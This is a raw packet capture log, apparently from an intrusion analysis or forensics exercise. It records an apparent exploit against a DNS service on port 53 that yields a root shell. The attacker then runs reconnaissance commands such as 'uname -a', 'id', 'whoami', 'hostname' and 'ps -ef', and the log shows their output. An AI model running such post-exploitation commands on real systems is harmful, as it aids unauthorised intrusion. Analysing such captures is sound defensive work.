00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 ........ =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/27-12:40:54.999893 0:3:FD:FA:30:1C -> 0:50:56:49:0:66 type:0x800 len:0x385 192.168.20.11:3782 -> 192.168.36.26:53 TCP TTL:63 TOS:0x0 ID:48735 IpLen:20 DgmLen:887 DF ***AP*** Seq: 0xA7F8989F Ack: 0xA47F9735 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 136971606 78345699 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 ... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/27-12:40:55.009791 0:50:56:49:0:66 -> 0:3:FD:FA:30:1C type:0x800 len:0x42 192.168.36.26:53 -> 192.168.20.11:3782 TCP TTL:64 TOS:0x0 ID:13889 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xA47F9735 Ack: 0xA7F89BE2 Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 78345701 136971606 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/27-12:40:56.025389 0:3:FD:FA:30:1C -> 0:50:56:49:0:66 type:0x800 len:0x5B 192.168.20.11:3782 -> 192.168.36.26:53 TCP TTL:63 TOS:0x0 ID:48736 IpLen:20 DgmLen:77 DF ***AP*** Seq: 0xA7F89BE2 Ack: 0xA47F9735 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 136971706 78345701 63 64 20 2F 3B 20 75 6E 61 6D 65 20 2D 61 3B 20 cd /; uname -a; 70 77 64 3B 20 69 64 3B 0A pwd; id;. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/27-12:40:56.030806 0:50:56:49:0:66 -> 0:3:FD:FA:30:1C type:0x800 len:0x88 192.168.36.26:53 -> 192.168.20.11:3782 TCP TTL:64 TOS:0x0 ID:13890 IpLen:20 DgmLen:122 DF ***AP*** Seq: 0xA47F9735 Ack: 0xA7F89BFB Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 78345803 136971706 4C 69 6E 75 78 20 6E 74 65 63 31 36 2D 33 36 20 Linux ntec16-36 32 2E 32 2E 31 37 2D 31 34 20 23 31 20 4D 6F 6E 2.2.17-14 #1 Mon 20 46 65 62 20 35 20 31 38 3A 34 38 3A 35 30 20 Feb 5 18:48:50 45 53 54 20 32 30 30 31 20 69 36 38 36 20 75 6E EST 2001 i686 un 6B 6E 6F 77 6E 0A known. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/27-12:40:56.049772 0:3:FD:FA:30:1C -> 0:50:56:49:0:66 type:0x800 len:0x42 192.168.20.11:3782 -> 192.168.36.26:53 TCP TTL:63 TOS:0x0 ID:48737 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xA7F89BFB Ack: 0xA47F977B Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 136971706 78345803 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/27-12:40:56.049893 0:50:56:49:0:66 -> 0:3:FD:FA:30:1C type:0x800 len:0x6E 192.168.36.26:53 -> 192.168.20.11:3782 TCP TTL:64 TOS:0x0 ID:13891 IpLen:20 DgmLen:96 DF ***AP*** Seq: 0xA47F977B Ack: 0xA7F89BFB Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 78345805 136971706 2F 0A 75 69 64 3D 30 28 72 6F 6F 74 29 20 67 69 /.uid=0(root) gi 64 3D 30 28 72 6F 6F 74 29 20 67 72 6F 75 70 73 d=0(root) groups 3D 35 30 30 28 70 65 74 65 72 29 0A =500(peter). =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/27-12:40:56.051240 0:3:FD:FA:30:1C -> 0:50:56:49:0:66 type:0x800 len:0x42 192.168.20.11:3782 -> 192.168.36.26:53 TCP TTL:63 TOS:0x0 ID:48739 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xA7F89BFB Ack: 0xA47F97A7 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 136971708 78345805 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/27-12:40:58.763188 0:3:FD:FA:30:1C -> 0:50:56:49:0:66 type:0x800 len:0x49 192.168.20.11:3782 -> 192.168.36.26:53 TCP TTL:63 TOS:0x0 ID:48747 IpLen:20 DgmLen:59 DF ***AP*** Seq: 0xA7F89BFB Ack: 0xA47F97A7 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 136971978 78345805 77 68 6F 61 6D 69 0A whoami. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/27-12:40:58.769057 0:50:56:49:0:66 -> 0:3:FD:FA:30:1C type:0x800 len:0x47 192.168.36.26:53 -> 192.168.20.11:3782 TCP TTL:64 TOS:0x0 ID:13893 IpLen:20 DgmLen:57 DF ***AP*** Seq: 0xA47F97A7 Ack: 0xA7F89C02 Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 78346076 136971978 72 6F 6F 74 0A root. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/27-12:40:58.789927 0:3:FD:FA:30:1C -> 0:50:56:49:0:66 type:0x800 len:0x42 192.168.20.11:3782 -> 192.168.36.26:53 TCP TTL:63 TOS:0x0 ID:48750 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xA7F89C02 Ack: 0xA47F97AC Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 136971981 78346076 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/27-12:41:00.024978 0:3:FD:FA:30:1C -> 0:50:56:49:0:66 type:0x800 len:0x53 192.168.20.14:1492 -> 192.168.36.26:53 UDP TTL:63 TOS:0x0 ID:18293 IpLen:20 DgmLen:69 Len: 49 5E CF 01 00 00 01 00 00 00 00 00 00 03 77 77 77 ^............www 06 68 61 63 6B 65 72 08 63 61 70 74 75 72 65 64 .hacker.captured 03 63 6F 6D 00 00 01 00 01 .com..... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/27-12:41:00.932479 0:3:FD:FA:30:1C -> 0:50:56:49:0:66 type:0x800 len:0x4B 192.168.20.11:3782 -> 192.168.36.26:53 TCP TTL:63 TOS:0x0 ID:48759 IpLen:20 DgmLen:61 DF ***AP*** Seq: 0xA7F89C02 Ack: 0xA47F97AC Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 136972194 78346076 68 6F 73 74 6E 61 6D 65 0A hostname. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/27-12:41:00.937456 0:50:56:49:0:66 -> 0:3:FD:FA:30:1C type:0x800 len:0x4C 192.168.36.26:53 -> 192.168.20.11:3782 TCP TTL:64 TOS:0x0 ID:13894 IpLen:20 DgmLen:62 DF ***AP*** Seq: 0xA47F97AC Ack: 0xA7F89C0B Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 78346293 136972194 6E 74 65 63 31 36 2D 33 36 0A ntec16-36. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/27-12:41:00.960416 0:3:FD:FA:30:1C -> 0:50:56:49:0:66 type:0x800 len:0x42 192.168.20.11:3782 -> 192.168.36.26:53 TCP TTL:63 TOS:0x0 ID:48762 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xA7F89C0B Ack: 0xA47F97B6 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 136972197 78346293 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/27-12:41:02.490887 0:3:FD:FA:30:1C -> 0:50:56:49:0:66 type:0x800 len:0x49 192.168.20.11:3782 -> 192.168.36.26:53 TCP TTL:63 TOS:0x0 ID:48770 IpLen:20 DgmLen:59 DF ***AP*** Seq: 0xA7F89C0B Ack: 0xA47F97B6 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 136972349 78346293 70 73 20 2D 65 66 0A ps -ef. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/27-12:41:02.509851 0:50:56:49:0:66 -> 0:3:FD:FA:30:1C type:0x800 len:0x42 192.168.36.26:53 -> 192.168.20.11:3782 TCP TTL:64 TOS:0x0 ID:13895 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xA47F97B6 Ack: 0xA7F89C12 Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 78346451 136972349 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/27-12:41:02.535241 0:50:56:49:0:66 -> 0:3:FD:FA:30:1C type:0x800 len:0x442 192.168.36.26:53 -> 192.168.20.11:3782 TCP TTL:64 TOS:0x0 ID:13896 IpLen:20 DgmLen:1076 DF ***AP*** Seq: 0xA47F97B6 Ack: 0xA7F89C12 Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 78346453 136972349 55 49 44 20 20 20 20 20 20 20 20 50 49 44 20 20 UID PID 50 50 49 44 20 20 43 20 53 54 49 4D 45 20 54 54 PPID C STIME TT 59 20 20 20 20 20 20 20 20 20 20 54 49 4D 45 20 Y TIME 43 4D 44 0A 72 6F 6F 74 20 20 20 20 20 20 20 20 CMD.root 20 31 20 20 20 20 20 30 20 20 30 20 4F 63 74 31 1 0 0 Oct1 38 20 3F 20 20 20 20 20 20 20 20 30 30 3A 30 30 8 ? 00:00 3A 30 35 20 69 6E 69 74 20 5B 33 5D 0A 72 6F 6F :05 init [3].roo 74 20 20 20 20 20 20 20 20 20 32 20 20 20 20 20 t 2 31 20 20 30 20 4F 63 74 31 38 20 3F 20 20 20 20 1 0 Oct18 ? 20 20 20 20 30 30 3A 30 30 3A 30 30 20 5B 6B 66 00:00:00 [kf 6C 75 73 68 64 5D 0A 72 6F 6F 74 20 20 20 20 20 lushd].root 20 20 20 20 33 20 20 20 20 20 31 20 20 30 20 4F 3 1 0 O 63 74 31 38 20 3F 20 20 20 20 20 20 20 20 30 30 ct18 ? 00 3A 30 30 3A 30 31 20 5B 6B 75 70 64 61 74 65 5D :00:01 [kupdate] 0A 72 6F 6F 74 20 20 20 20 20 20 20 20 20 34 20 .root 4 20 20 20 20 31 20 20 30 20 4F 63 74 31 38 20 3F 1 0 Oct18 ? 20 20 20 20 20 20 20 20 30 30 3A 30 30 3A 30 30 00:00:00 20 5B 6B 70 69 6F 64 5D 0A 72 6F 6F 74 20 20 20 [kpiod].root 20 20 20 20 20 20 35 20 20 20 20 20 31 20 20 30 5 1 0 20 4F 63 74 31 38 20 3F 20 20 20 20 20 20 20 20 Oct18 ? 30 30 3A 30 30 3A 30 30 20 5B 6B 73 77 61 70 64 00:00:00 [kswapd 5D 0A 72 6F 6F 74 20 20 20 20 20 20 20 20 20 36 ].root 6 20 20 20 20 20 31 20 20 30 20 4F 63 74 31 38 20 1 0 Oct18 3F 20 20 20 20 20 20 20 20 30 30 3A 30 30 3A 30 ? 00:00:0 30 20 5B 6D 64 72 65 63 6F 76 65 72 79 64 5D 0A 0 [mdrecoveryd]. 62 69 6E 20 20 20 20 20 20 20 20 33 36 30 20 20 bin 360 20 20 20 31 20 20 30 20 4F 63 74 31 38 20 3F 20 1 0 Oct18 ? 20 20 20 20 20 20 20 30 30 3A 30 30 3A 30 30 20 00:00:00 70 6F 72 74 6D 61 70 0A 72 6F 6F 74 20 20 20 20 portmap.root 20 20 20 33 37 35 20 20 20 20 20 31 20 20 30 20 375 1 0 4F 63 74 31 38 20 3F 20 20 20 20 20 20 20 20 30 Oct18 ? 0 30 3A 30 30 3A 30 30 20 5B 6C 6F 63 6B 64 5D 0A 0:00:00 [lockd]. 72 6F 6F 74 20 20 20 20 20 20 20 33 37 36 20 20 root 376 20 33 37 35 20 20 30 20 4F 63 74 31 38 20 3F 20 375 0 Oct18 ? 20 20 20 20 20 20 20 30 30 3A 30 30 3A 30 30 20 00:00:00 5B 72 70 63 69 6F 64 5D 0A 72 6F 6F 74 20 20 20 [rpciod].root 20 20 20 20 33 38 35 20 20 20 20 20 31 20 20 30 385 1 0 20 4F 63 74 31 38 20 3F 20 20 20 20 20 20 20 20 Oct18 ? 30 30 3A 30 30 3A 30 30 20 72 70 63 2E 73 74 61 00:00:00 rpc.sta 74 64 0A 72 6F 6F 74 20 20 20 20 20 20 20 33 39 td.root 39 39 20 20 20 20 20 31 20 20 30 20 4F 63 74 31 38 9 1 0 Oct18 20 3F 20 20 20 20 20 20 20 20 30 30 3A 30 30 3A ? 00:00: 30 30 20 5B 61 70 6D 64 5D 0A 72 6F 6F 74 20 20 00 [apmd].root 20 20 20 20 20 34 38 31 20 20 20 20 20 31 20 20 481 1 30 20 4F 63 74 31 38 20 3F 20 20 20 20 20 20 20 0 Oct18 ? 20 30 30 3A 30 30 3A 35 30 20 73 79 73 6C 6F 67 00:00:50 syslog 64 20 2D 72 20 2D 6D 20 30 0A 72 6F 6F 74 20 20 d -r -m 0.root 20 20 20 20 20 34 39 30 20 20 20 20 20 31 20 20 490 1 30 20 4F 63 74 31 38 20 3F 20 20 20 20 20 20 20 0 Oct18 ? 20 30 30 3A 30 30 3A 30 30 20 6B 6C 6F 67 64 0A 00:00:00 klogd. 6E 6F 62 6F 64 79 20 20 20 20 20 35 30 34 20 20 nobody 504 20 20 20 31 20 20 30 20 4F 63 74 31 38 20 3F 20 1 0 Oct18 ? 20 20 20 20 20 20 20 30 30 3A 30 30 3A 30 30 20 00:00:00 69 64 65 6E 74 64 20 2D 65 20 2D 6F 0A 6E 6F 62 identd -e -o.nob 6F 64 79 20 20 20 20 20 35 30 38 20 20 20 35 30 ody 508 50 34 20 20 30 20 4F 63 74 31 38 20 3F 20 20 20 20 4 0 Oct18 ? 20 20 20 20 30 30 3A 30 30 3A 30 30 20 69 64 65 00:00:00 ide 6E 74 64 20 2D 65 20 2D 6F 0A 6E 6F 62 6F 64 79 ntd -e -o.nobody 20 20 20 20 20 35 30 39 20 20 20 35 30 38 20 20 509 508 30 20 4F 63 74 31 38 20 3F 20 20 20 20 20 20 20 0 Oct18 ? 20 30 30 3A 30 30 3A 30 30 20 69 64 65 6E 74 64 00:00:00 identd 20 2D 65 20 2D 6F 0A 6E 6F 62 6F 64 79 20 20 20 -e -o.nobody 20 20 35 31 30 20 20 20 35 30 38 20 20 30 20 4F 510 508 0 O 63 74 31 38 20 3F 20 20 20 20 20 20 20 20 30 30 ct18 ? 00 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 10/27-12:41:02.553846 0:50:56:49:0:66 -> 0:3:FD:FA:30:1C type:0x800 len:0x442 192.168.36.26:53 -> 192.168.20.11:3782 TCP TTL:64 TOS:0x0 ID:13897 IpLen:20 DgmLen:1076 DF ***AP*** Seq: 0xA47F9BB6 Ack: 0xA7F89C12 Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 78346455 136972349 3A 30 30 3A 30 30 20 69 64 65 6E 74 64 20 2D 65 :00:00 identd -e 20 2D 6F 0A 6E 6F 62 6F 64 79 20 20 20 20 20 35 -o.nobody 5 31 31 20 20 20 35 30 38 20 20 30 20 4F 63 74 31 11 508 0 Oct1 38 20 3F 20 20 20 20 20 20 20 20 30 30 3A 30 30 8 ? 00:00 3A 30 30 20 69 64 65 6E 74 64 20 2D 65 20 2D 6F :00 identd -e -o 0A 64 61 65 6D 6F 6E 20 20 20 20 20 35 32 36 20 .daemon 526 20 20 20 20 31 20 20 30 20 4F 63 74 31 38 20 3F 1 0 Oct18 ? 20 20 20 20 20 20 20 20 30 30 3A 30 30 3A 30 30 00:00:00 20 2F 75 73 72 2F 73 62 69 6E 2F 61 74 64 0A 72 /usr/sbin/atd.r 6F 6F 74 20 20 20 20 20 20 20 35 34 30 20 20 20 oot 540 20 20 31 20 20 30 20 4F 63 74 31 38 20 3F 20 20 1 0 Oct18 ? 20 20 20 20 20 20 30 30 3A 30 30 3A 30 30 20 63 00:00:00 c 72 6F 6E 64 0A 72 6F 6F 74 20 20 20 20 20 20 20 rond.root 35 37 30 20 20 20 20 20 31 20 20 30 20 4F 63 74 570 1 0 Oct 31 38 20 3F 20 20 20 20 20 20 20 20 30 30 3A 30 18 ? 00:0 30 3A 30 30 20 69 6E 65 74 64 0A 72 6F 6F 74 20 0:00 inetd.root 20 20 20 20 20 20 35 39 34 20 20 20 20 20 31 20 594 1 20 30 20 4F 63 74 31 38 20 3F 20 20 20 20 20 20 0 Oct18 ? 20 20 30 30 3A 30 30 3A 30 34 20 2F 75 73 72 2F 00:00:04 /usr/ 73 62 69 6E 2F 73 73 68 64 0A 72 6F 6F 74 20 20 sbin/sshd.root 20 20 20 20 20 36 30 39 20 20 20 20 20 31 20 20 609 1 30 20 4F 63 74 31 38 20 3F 20 20 20 20 20 20 20 0 Oct18 ? 20 30 30 3A 30 30 3A 30 30 20 6C 70 64 0A 72 6F 00:00:00 lpd.ro 6F 74 20 20 20 20 20 20 20 36 35 37 20 20 20 20 ot 657 20 31 20 20 30 20 4F 63 74 31 38 20 3F 20 20 20 1 0 Oct18 ? 20 20 20 20 20 30 30 3A 30 30 3A 30 31 20 73 65 00:00:01 se 6E 64 6D 61 69 6C 3A 20 61 63 63 65 70 74 69 6E ndmail: acceptin 67 20 63 6F 6E 6E 65 63 74 69 6F 6E 73 20 0A 72 g connections .r 6F 6F 74 20 20 20 20 20 20 20 36 37 32 20 20 20 oot 672 20 20 31 20 20 30 20 4F 63 74 31 38 20 3F 20 20 1 0 Oct18 ? 20 20 20 20 20 20 30 30 3A 30 30 3A 30 30 20 67 00:00:00 g 70 6D 20 2D 74 20 70 73 2F 32 0A 72 6F 6F 74 20 pm -t ps/2.root 20 20 20 20 20 20 36 38 36 20 20 20 20 20 31 20 686 1 20 30 20 4F 63 74 31 38 20 3F 20 20 20 20 20 20 0 Oct18 ? 20 20 30 30 3A 30 30 3A 30 30 20 68 74 74 70 64 00:00:00 httpd 0A 78 66 73 20 20 20 20 20 20 20 20 37 36 35 20 .xfs 765 20 20 20 20 31 20 20 30 20 4F 63 74 31 38 20 3F 1 0 Oct18 ? 20 20 20 20 20 20 20 20 30 30 3A 30 30 3A 30 30 00:00:00 20 78 66 73 20 2D 64 72 6F 70 70 72 69 76 20 2D xfs -droppriv - 64 61 65 6D 6F 6E 20 2D 70 6F 72 74 20 2D 31 0A daemon -port -1. 72 6F 6F 74 20 20 20 20 20 20 20 37 38 30 20 20 root 780 20 20 20 31 20 20 30 20 4F 63 74 31 38 20 3F 20 1 0 Oct18 ? 20 20 20 20 20 20 20 30 30 3A 30 30 3A 30 30 20 00:00:00 72 68 6E 73 64 20 2D 2D 69 6E 74 65 72 76 61 6C rhnsd 